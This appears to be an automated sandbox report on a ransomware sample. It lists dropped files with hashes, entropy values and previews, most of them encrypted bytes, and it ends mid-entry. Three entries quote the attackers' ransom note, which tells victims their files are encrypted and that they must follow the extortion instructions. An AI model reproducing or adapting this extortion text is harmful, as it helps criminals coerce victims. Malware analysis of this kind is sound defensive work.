                            Preview:..W~.rK.....Q...UN..o,...y.Y/.._6....N..sS.t..~...78......NX..J_.ab........4........9.w..C........Z.m.......>6....:..h..D.BL.....-(O5f..e...MX...k.(1V.....t:!......F..Ul.1..G...sp.q.8l.|D.....$.+t.Dc.n......W....u..../c.....?..W..>!(.^.n....+...Nn*-.L..B1.._U..M.....`...Y.'._..T..!.m...iTV)..m.....a|...%Z.....m.u.....e...*.f..Z..........q.2.......Q.X.|.8.q..O.89....~!.K.!.k.(...._......gc.M..q.,6Vd........@.F.l/.K...I.w...[...-.Tg..M.74!....<....:.e..b..c2.6...^..zR..2.~...9...s.H......<..Pr..7......0gk.....|Lq..I..d...V.)..9..=*..qC...Su....If..=....c.....h7...I.......=.Z.....dqb_..;..rQ5e..R..B......D..T_.IqFT2#X$.I.....i^.@q...@.i..2.R....E...QBB&:.t..q...V.Ll.bg.-.....H.:..gl0.{Q..........B..}....7..2..0a.\.\...?...,s..y...;.].N.....E=C.7..ERc..d.....y..Y\.B.......N......Z......A...ul..'...8...$.."C2...9....q.X.....r...S.!....Q...r...W_B.Y.....#.%.8.fC.r.WI7.8 v...7C..H..).%[......4..C.k.f ?T..Wno...b\...../.[..S.k..J..v..7.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:Dyalog APL version 73.72
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.831061357680338
                            Encrypted:false
                            SSDEEP:24:GR0sgQ++yH+0UFfWM12VgYp3Crk9EZh66azsadtlAIJ6FZ4lGiQacmfG:GRBT+9etFfVUiumr9nIJJlhQ6fG
                            MD5:DA10743B0B86888820878746523D94DE
                            SHA1:736FBB5A6EC139E9E3DAC0E887645252A61B3871
                            SHA-256:4D3DDE5941DF770D5C4603A25DC5FF39206E79D3BC4F2FE34168493361635ADB
                            SHA-512:F4B9726E07CF39B76E620655DDDAF61B46469AD507C2FB35DA735F9C923CEB698F05F026447E213462022EA44E9F8BAD042D71847425ADAF82EB390941B96D61
                            Malicious:false
                            Preview:..IHp....3.:Am'.....#..7........< .o...*7......;....\8.b......s.`.....BW>L.GA......+n..{......iw..y?.v...Vs..c.i...f....'/l.N{.k..c...F6.Dz...R.R.......q.8...-..;..$....R.]AB.c.......8...R...s...w.$.O9N..kB..=.........|..._f.+......f...+.8.............{...kK....V.m............J.....?..yK'..U.W....$.t...Bw.c...P.F.. ......t:~......5.....\=`......D"._y.`C.p....3S.Z ....{4.DH...........1...f....i%./.....h.TK..;....Ws....b..b.^.B.\......).8.......T.G[r.]np.....fg...Q=`...I.y98'V`M.....s.]..^]T..$.,.........s2...h.+q...=..H..T. 36.......qW..X.......;...?...$..f..&gE.z.H..o..7..1.......*..X*wC.b.>q.E*...."qmo..d9../v..w4............P.-..N!.Cd.Z....2:.]&..A.y...f2.H.O....C.LV.[..*..c.@..F....%M...m..c.....#..... ,...S....r...Z.f!.kQ.Z:.S.?....9{......:..'..2..Iv...j..8..>.(.M}).x..z........,.-...X....C.(..5rf]~...?G...HTJ.Ol..I..|.F.9...m~......T.E@..bh..4.~5}..p......nN..o.9.m.\...........B./.;..wc.-.J...K..R.R....V..k.Q.2.t0...+...h7%..b.[..c(eMF<<hM
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.841714878475969
                            Encrypted:false
                            SSDEEP:24:/JHEC1SwotGdMFVL3KWuhGXXPZ+3g8z07VTMa8iWlGiQacm4Yf:6xhtS68WuhGXXB+QbjelhQ644
                            MD5:1FCCB8848B32BE219711F46005D0574B
                            SHA1:31EBADED86BDADA476581FCB4184B76D9BD80901
                            SHA-256:4277DFD40AA20EB4008E07BEF392A7D37C331F891F980A75E0E9E8654D525D57
                            SHA-512:3911CD07CE4FF8ECA4F42FD86C0CED6E995B9C453B2B0E16DA2A4A71BD51542A31978F329EB7356326205B68E7C73203517642A28AD7754CA8CF0CCC1AF6D2C2
                            Malicious:false
                            Preview:L...........9.........w.3..^...r.;T%-C.%.qo0..."..I...D..N'...QU@x..WB...s..mf....B...T.T\.K....{.D......(..X.f.-6.3H..e.....\6....k...S....T..G.u.(.v`VP*`Tr..6.\p/;Me.o.M5...a....@d..B.&....+K..0.W;PO...<c.I...[o..tR...........w.4..q.~....V...1WO..^u....>.;.B...C.].....W.z..B.-D...a..D.@.M..^...18/..../Y......gU.l.f..h....=..}Q.W.'.L4.,.U...>.*>..e.]...0.:5..ad...g^...EWJ..<.....M..*.._..2..R.Fv....oJ#.|m)..A.S..(.R.a...$h.t]....8./.:...%.iO&.....c....A....V......QH1z2....*7l..nX~.`.H..A.#-.^.y%}...~<P<....+~..F..A%|..).&..b........T..9=.`>.....p........!Oj....|O.`dK....Q.Y.G...ef..=D|..[...."..Z..?....z.!|.aU..7.{6..t`...@CN)".2"2..k..U.....}.....J.#..m...L=..@..G.......).iA..E.2.MA&.'J6...+.K.{\t..<QN. ':.q.(.......?.......8.'.H.=|S.d.Rf.e.,..xx...7<...._0..,....k..U_.UU....Pt.]H...}4....C..&....x~.#..<...+.x..1.F...}..8.<=.....Ec."`..._/$.}......6...........B<i...V.O....cZ......u[..._.!Q...K...r.F1..m.>..>.',..Mx1q....]....^.{......
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.850084375283667
                            Encrypted:false
                            SSDEEP:24:EXgadD+N7HAk6OCwFtNSHqhCjiz8BiI9rAtxPpEXKt9hlGiQacmUgJ:EXIbL9FEqQjizva+xREaplhQ69
                            MD5:16BA854645556C9EAF4D695D156CF6A2
                            SHA1:B2A03CA6D884D2DF20E8FA794F4AD12F810D9BBA
                            SHA-256:FF3F15D980BCB6BA10D6922C2B20F8ADA492435A0BC6A981FC6A5E3930D2568A
                            SHA-512:2B9CCB275CE1FD4823D21668DB1490DAAE591EFEB3C29B722272D132B30A60FE4A45428347822639DC67E81FB5D08BFD735721C4E8D01AA165497D5BCDC60061
                            Malicious:false
                            Preview:S........:}D.d~.....V.s..O.f....&BA.P...*}..r.B^.6.W.?..|D.!dBU....h.G..wgg...*.O.E%..._#......'.,....x.{<.K...f..z!...st.......".@.V......rL.56..Z...BC.............v.@.......#......|0H...FrS.....fy...r.(..%..x..b,.X.&...._..j..&.....O..4..........*Z..FO%.Z./qn...e.........k.....[..@..t/?..d....8...OF6...N.,+.!...-).....9.Q.:J$..b....k....P..__.FIU...%.':E#i.w.2....e...P...=....S..W.T^Z.-.6!'.BM....Hk.T..&j0.U7.#.T_A..>.....P.......LC....H]N7*.A....~.....!......;A.....k....C......../.n&=/.......?.HU3...~....>..../.|Ud...B.o2.>.4........@.O........q.~...)."..w$9\...Z.~....s6.n........Ly.F..P...V,n..R...;.V....4.Hx~...... 9sy:..k@.L........g-!K...9...B..Y.).....m.v.o..$.F..J6...>.,......}.@....-.....R.%{..&A..N.s.I .....k.?.x.b...E..?.?..f c3..3(.A..|.x.c...!I...9..<.W.........u.+.v.....5.?.7o...E...<.'R.$....Pr.....[..J.x.x.FQ".OixG..K...K..O.Kv]...9....Gp.r.=1....u...........'..Fb."..!.j0....?#`......$M=..9E.;.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.853051293496958
                            Encrypted:false
                            SSDEEP:24:cij8cLgzvET9o5BO7CW7Pd+TyJa6jWp57G4jqc54RMjyA4qY+mSWMculGiQacmgL:/jIEuy7DzdTypAGqc54nxJNMculhQ6gL
                            MD5:65484970E6EFFDA3868CA46C818EE76F
                            SHA1:A731887D07C236C275303FE00DDCC99BB4373C1F
                            SHA-256:C2920C0203485D300D6D89D548EE0763BBCB66E6E58A7961990C2AC4BC1B7702
                            SHA-512:FA129A264DDE098ECE512B3A523CB1B57BCA88D56F10EEA4859819B7DBD4214924C0F6F798CC67A5ABB2ED9F0472C33EBDC1EE154B55F6731B59707710B8DDFA
                            Malicious:false
                            Preview:(sn.....w.usPE....O..j.@zi>}?R#m).2Q.L9...;XV.y...U.. +..k<S..A.G.q..Z.o.i}.T{8..9,..G.S1..z..d..A..k...:......iTV..hg.i.......j.n.Z3..A.5....S...&..E..C?._...`.u..&,..B-ba.....W..t ...CI.Z.$..`O3.."-.....3....P..83*...$..>0.V.....rU`.p.;6Bo...A.!.....D?.sq.....cA}..k4......n....nc...p....~.fe4...,.....c.R.x..~QWY.in.B...5_O...e{.n_."X.2.E!.;..H.o.}...*...VEjF.#"#.UE..(.+...?...Z.e)..#k,..>FV.+...n>E...Z...CE...{.Q2=.......'.r..`...g_...C.?....*y...F2.qf.n`.h..b....f.[6...B.;oL6..`..1....W>..l..j...X0.5[..>.K.^...\..{.N..6t..5|.....`S..E.XT..I...e..*ut<.t..j.H....!..1...~l......lH...qu.... 86....S..!E$.....|...w.z.m....j......."...c.y[.Q....&.<...9#t.......Bh.....}.%....I..]..xZb(...)._s4y......z@1.o....!.........E....s.R._...z`e.w.....c.31......D......OD.++.,.....X3...H.....I.+nela%.\....LFY[.D.G%.Y...f"Z\\u.).uu..d..........g...O#..&.OA.[.#...<...0..#.C'.6...X.....o....".9f.!.D....<...wz&....g.../|.l>.....~so..>....p..Y..Z.m...(L.|u...
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.859219020484755
                            Encrypted:false
                            SSDEEP:24:wu6WsFqfunsuOgQyEode4F6jt/1K5qF510q3lGiQacmJrh:MFYWGgQie44p1gqF510clhQ6Jrh
                            MD5:6147C7DB44604272286D3E7666BC3779
                            SHA1:36B469E651379FC9A175C4A0F26928110EFC4FDE
                            SHA-256:DF4D9AD34254C7490111FE9594E8E3DC537B5AF638140112BD18A33DEA45D8C2
                            SHA-512:1D83A5222DD953C41995E5815705509BB28E5F3136335FAA55702CBA0AB22CD26594276463D4C0FBDD74B44B8A98826F0A247CB912E054FA1DA293C8E0D5B718
                            Malicious:false
                            Preview:...Y..../..2.TN..j.0\.^.b..P~.'xo..vL...#...I.....;1:ky.Q....?......U.[..\#.......N@b..K.pC....=......k.U._.T13.3vc...0C..;.m_f..7.P...+.E_<.y......n....h....nE....-E.3.N.e.=....xl.F..$...Y..7.....tW.k<..eC]&Z<*..d-.P...&.%6.....j9)J>..lv....b.....PoR..0.l`^m..k..C....'M.x|.Dr...g6n."Q,m..S...d..p.......O.\.....W.Fs1../..&......."T.%.C.}.("...."....$....<|.:KK.1,s.|...b..a./..T..}9/.d...vL(imo..:....}X.N{.g.~...W....EU@(..V..].9.@9.._..}....g..A.z./mwP.R..........o.(..@......!O.j.v...0_.e..t......Tl...=T$%g....)j..DL0.d..=....lJ...._..o..=5:..Q.....1....(.....r.R.njV...e~2...u..P?.Q....2...Fov.....[..+6._....$...b....6...n..Xr..^.-.I...j!Re.dwh......e...B...p..G..5...f...i.p......(.ZH......I..>...<y.&.$...w.45.....1.4.d..g....4.M...3a....4...z..R..W*U..3q...Ro..3O...M....o.c.m..iJiV^.%.U.P.Ag....%..~.....0..c..c.6a..Z%..zC..(!..7..K.TP.0.....q\ ..ym...4p+>yk..'..?.Vc`..8.p.c...]Z)...v./T.3..=..V..E.e..6.`b'ao..z.q....7............\.....R..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.845954276002035
                            Encrypted:false
                            SSDEEP:24:4KpRxUcJzo6fg/REL3C4eDOWpzL0NHehXm9ukwqHDldlGiQacma:d6d5EL3C4lOkHehXRkwE5dlhQ6a
                            MD5:1634480EFFFB2009D8135A2D9B92C5E5
                            SHA1:36ACBE7E8D750A24F7D86280D3247A25588A6D99
                            SHA-256:19E115EF17F50ECB8ECE477B6F7BA0B6130F0113520A66D9B496740DD9AEE7D4
                            SHA-512:F7EB59A8DE902CDEF75BC70A8A028DEA0E722A67F34CAE64A313CEADA1966B31615636360871060ECF933A1C91A6BFE84D0AD215D48A339BE2558647FD30FE8E
                            Malicious:false
                            Preview:.hZ..~I...1....u.......x)...x..o..@g..;.&...9$.n.....yw..$...Y.i.vX.f...A...)R.........&....M..G...T........+....N`.0.. .sGx...sj...=.....r.........k,3.z5i.V>.?Rx.........XT#....U(..po..qKX..zF..Y8^Yr3#W`.lalz..L.N....Z$.v|L..&..aH..;]...%.a..0y.K..........7.&S.......t..._.Cq..$.bd.~......K<V.z%_.z.../<.D-P%7..F{.Yw.X..L..rL.*...&l....d..n.S.....w.U..z?..]Lv!j....(.4.X]z..D....a.......g..demr.xfj..T.VA.{"JV.@.V 4f....:..t. ... ..r\m.'%..T...S).R.,F.*...b....o<.s...#..B.D.H@....N&M^|.E...0..],. u.J>o...........B[..B....V{....d..*2..{....Q.!..C.-)..........."..\A..(.....mn....8.u....6....S..\../.Y.{..bE...v....^..8$..mOEOv..@..u.l....].X6......2.z75@J........'C....>..)..~5.6........-AiSH......]...3m..XI.!.U...$.}T@8.f.(.B.xP......S.<....6N.>. ... ...;.<..+..k....*..+,...[7G...T._...8Xu...V..Cz.. ..Z..l..T%...=.+S!.j...MMp.;...$...6....-..NO(+.-..I&..`%.F.D.C.]..ww....4.F......l...B..V.....q. ._|Q..v.o.......#../...n.6......c.SLl..u...-...
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.870782991872104
                            Encrypted:false
                            SSDEEP:24:Kipvw/9mYEVuuWwbwvZ7JaT2cyHkcyTAQGaOYpugylGiQacmyY4p:KipA9aUQ0O2cZpSlhQ6ypp
                            MD5:C2BF3F66CB0D7E8321E927CD761E2607
                            SHA1:2691FCA04FD2E1F3002C84995A06588804DA6E1B
                            SHA-256:0A922C8CF20BCC23EBDB4E0C8AEE24DC85A7ED3A95A77F7BB70B2FC41537775E
                            SHA-512:468B605187DA84F3A54D1B2B8F34734BD3E4ED078467D3B3D0095A71B3D71E1FA534A7D2CBD9E3A5E6757F9485609772C3CBB43E2B20E3BC4CFBF1271A54408B
                            Malicious:false
                            Preview:.....&...c.|.r]..IG8.$5.*.:.UZ.8".v.leWr....".!t.a.H]@a....PlKo.(l.{b..N..k4..s.....$m...Hh...G..:...dJ.`..#.c.h..o.... {.o...........`.......0....x...s.z.G.i...XC..xD....t2......b.36...u..8..F........ZR.......@......m...(.Y.....c1Pb.K.$R.5*?.:....i..5.],...!T..(.......^w.N...O...z.g. ..E..{J..f%..H.e.Q.A.;.)f.N'Bx6.gT.s}..n.]C...B.N:.,.\6+h./bP.(..9....-..+`N...:W..".V......k].,..k......Xo.....}5..RN...-.V..f.j&D3...,.RyG.......Qc......<C..3..LB".Fa.*.....3K.9.u`c.1Y.f..<..s..5.!..:.Q.h..wT.T...g. ..@C..+...Q."].g...[i.?..;.U...9.D.zy[...h|...!...k..I4.qZ.L.%..@%Xu..I.%r.zth!..,.k.3.&....Z..0xBP......A./...M.....S.......'2.W.E9b...\^j..|...=.....Fo:...R..U6...(w.)..3.X. .i...~h...H.D........M..=i.c>..._.L..Q&K"'.o....R....x.j.|...=.-...V/....;.3.Q.,....q....w.J..k...&."V..x..j.+....*.t\\N...q-g....:C..mw.....T..3...m{......H....Q:...JlVm..f....."e..93EIp...U..awm.J.)..X.D....q.:......../i-.8...]y..1c....._.BU.N3.v..d....W..U....n.*+%.e...c.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.852298854054062
                            Encrypted:false
                            SSDEEP:24:tQKZ0WdmcsOUXx0Vl3EN0b3QmTFsJErTL6FrmxmlGiQacmBk/:tD4csOUB3NQQmxbKrxlhQ6Bk/
                            MD5:C64A08B3349CA57674B37E0AF42557EE
                            SHA1:CC174E8EF1E190F884366CE1AEE8B8045CA736E2
                            SHA-256:3B22969874F17B41DB3A4CD9AF5B223B8B1641ED8F35FF43F99E0AB27836C186
                            SHA-512:014CBCFFB6B5656DEA75348EBA100599D720FE6972E6DFF45EA59078B710E4BBFEDFB67EBFE40816CAA8E36794DADA5803C1B09EE40EC8F37EB95FE9AD97C325
                            Malicious:false
                            Preview:g ..'..{e7-y..Y.t .f.....S..;n.....w..t.1.-..../..k.....4......".f.....".`....n.Z.U....+.`d^Uy.\.)*..V..H.....jK9f15.<.`:......t..}.^3:p2p...r.w...9.."d..*-...9..8...3?...'7]s.xh..8.,LeJm..<..Q...@BS.^24Mf..$....dbM..$...^4..H... sG.......t.....1.Ou....L..s.&.!...OA....'.m..*..[.^)...My.>..JV:]Y......K2#I...x.Hx..\P.=.P.uWMf.@,."..w..7.......>....u.......k.?o....wL....3.&...\x.6..(...+0>.9.z-.C.1v.1d.Ap.......cF.\...6{........Oa..F...(V5...U`x..mT.M.."X$ur_5..r.b.&^'.....AA...vm..*......AD..[...M&..8B.3.<#=nk..Z.r!<.*.O].@.l.5Q.Gm.'>...p.6.....Q.wT!.....yY..V.l.Q.UW...i.."..(9... ...Y..Yu..z.GjCY.i}.U.r..g..\.L..Vg....~..>F.v..Z.hY.P....1.Yr.b ..T....._J.d.V;...._.. x..:[..>=..K..NYC$..K.X...Qx<.wj......v..J.EL...[..y..n=E_......LM|:.?.PodI...o.E.d.~X.....\....~G.Lw.9.#...It...,I.*...+..O1..R..c..4c.....,.{JM......C...\uV.$. 4....kT../tr-h1..,..(.p.S........b..!:..n..M(.Z.Y.o.......a..q...n.K..z-.,`...(=V......$.KX....sc......*"0.W%.P.Nf..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.863115774701896
                            Encrypted:false
                            SSDEEP:24:Vy/u1d5JDs6i+iLgyX+UzFBeVLTXjGaIif5UC/I5eQ3MSyMlGiQacmJs:j7JDs6i+wgXKEVTcieTelShlhQ6Js
                            MD5:28C1C1B1BB54AD7F71ADAFA520EA14C3
                            SHA1:2F0F5C5556E44CCF4DC6A09626D4778C69078799
                            SHA-256:052AC4D72743A7BD613999A94EA51C714A1EC2087013C2E6283BE03FCB386847
                            SHA-512:5AC26AFD6F219286ABB6CFA031F940D3E05F875DDB57D7E470330D9C5C15809F8C95B17C858FC00C65A86ABD3067CEF8C7C0D892B2446ABCBC61F0DD55C512BE
                            Malicious:false
                            Preview:b.t...-........I#.uC.Z.".q.....|...#.C._...W3..e8Z..b*.3....g...T.c...#.7..w.5.....W...>...>.../..u.G...._.v[..o...|....x..T.u:n...H......N;...c....z.VTn._..................cG...Le./.pQ1...C..r..4......D...F....3....o.{R..8`.....E\...=Hz...Jz.5.f...(...*+B...@.t.... .n.l.]....X...Z.'..1).i..5......ia.B...k.pL.......t....Q..k&..7...1.2.....@..A/.!..n..u.Z....".?9.!..(....!.Y..d............Q.A...*...*..[*d..8...s..:G./.:h.....}..`.....".i...|. U.............:.L.ZW]..^D....x..eU...-<.xF..\o..Q.W./[.} .gy....cCs.e.. kj.m.-Lz..../.!..5C.......,L.z..E.....E.Q ,Ds..6cA..(6.....%.Ku.g..i~.X=.|...".N..,;....).OF}.Y.....+N.m52..RAL..2r/..}}s..5.g....q.......WL.>4.`B&..V..^.(....@B..pD.0_Qx....E..Fd.....>G>....w.....m....Fw1..-..C{ .?v.m..'...<...o.......P.....b.D...........V......-.s.@m......%\.J..?+.l..8,(.........+...X....L.nE.".X.?.f~._]...Y5#......,..h.....k......d..lA.y...l.S..(o......>-.]u..qOj........m.n.k.|..)Q..e.)...@wI.{l......y..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.841825137220612
                            Encrypted:false
                            SSDEEP:24:endgs7PmYDA8vqHNciV7vKqWJusa7P7llGiQacmDCy:enes7PmYbvoHILLa7PplhQ6Wy
                            MD5:D950C4FAE7633E68334FB6BCC3BA6425
                            SHA1:860E13D22F7FBBBA0F29A492247984EB092A6E75
                            SHA-256:F945C1BD8105ACEE759A3B8FC14A40EFF1C05C599E18B39E79E3EF013831E4AE
                            SHA-512:52BBE3BE691A648EBAC8BBD20B0A0690A1C38825C2B267D30ACC91243B4DF204A0FDE5B8FAA560DFB8B8E27F256DC226FAE187588266BC3A42E78858AC06A96F
                            Malicious:false
                            Preview:.k.......\.4..9.Y..d.Wq.]......J..Kd*k9...B...g[2s.......5...T.....u..'.5.....5.|.I....aW..[........g...cc...0aa.f.T.]...Oww5Q..U..(....9..{`.....a,.K.....i.2..3-..cI)c.)...7X..._....b^@..9f.;X.pC6...e~.....S.P........M.5...T....].....c...LF.,y.c\....T.....f.Q...;.>...-... .._BDq......i]#...h.9aYR..YR.;...........J...(.'.......C.lrew6....xq.,.@lx.?.2.?..............`G. i...e... .[/......H..\c...3..|.dg.s.6.= .:R..-]]...I.M_x.p.-...h..`2..STs....S..........:.~....5m.{U..T-..[.Z..n,,'..Mm..`BCkP...L...M........|...?.d-.E.d.r...o.f/.......5......F7..... N....>........'....Y....O..p.....w...)............hb]...?..%...M./........i..x.6..G...Ji.$6i.O...X:...............eo..P.......p......L1.D.DQG.4...y>...O...J..k..}...-s..W....2l?j..$....(w.........h1.A.:....`.O...3)..v.MI.8..+....I..Q..Bf..l.V ......DV ..._vl.D.p..&S.....)....;:.`"..../G.W.. @..%.<.0.@5.1-L.&}b........D.T..#8R.."[.......oZ..0 T^=....@.k._...`..i.E..H..r...........E..Q.....k.sy..0.M...
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.823529193348072
                            Encrypted:false
                            SSDEEP:24:Gdh8c55JoFkftnQTVhlf2c/35NN3PzcqHjAUIlGiQacm8:oXoi1Q/Mc1fzc4jAUIlhQ68
                            MD5:E723CFBFE0857DAEB706B6C4A45EB27F
                            SHA1:E35543EE08AEA7A8F2982E7674DCC778F0DA03B4
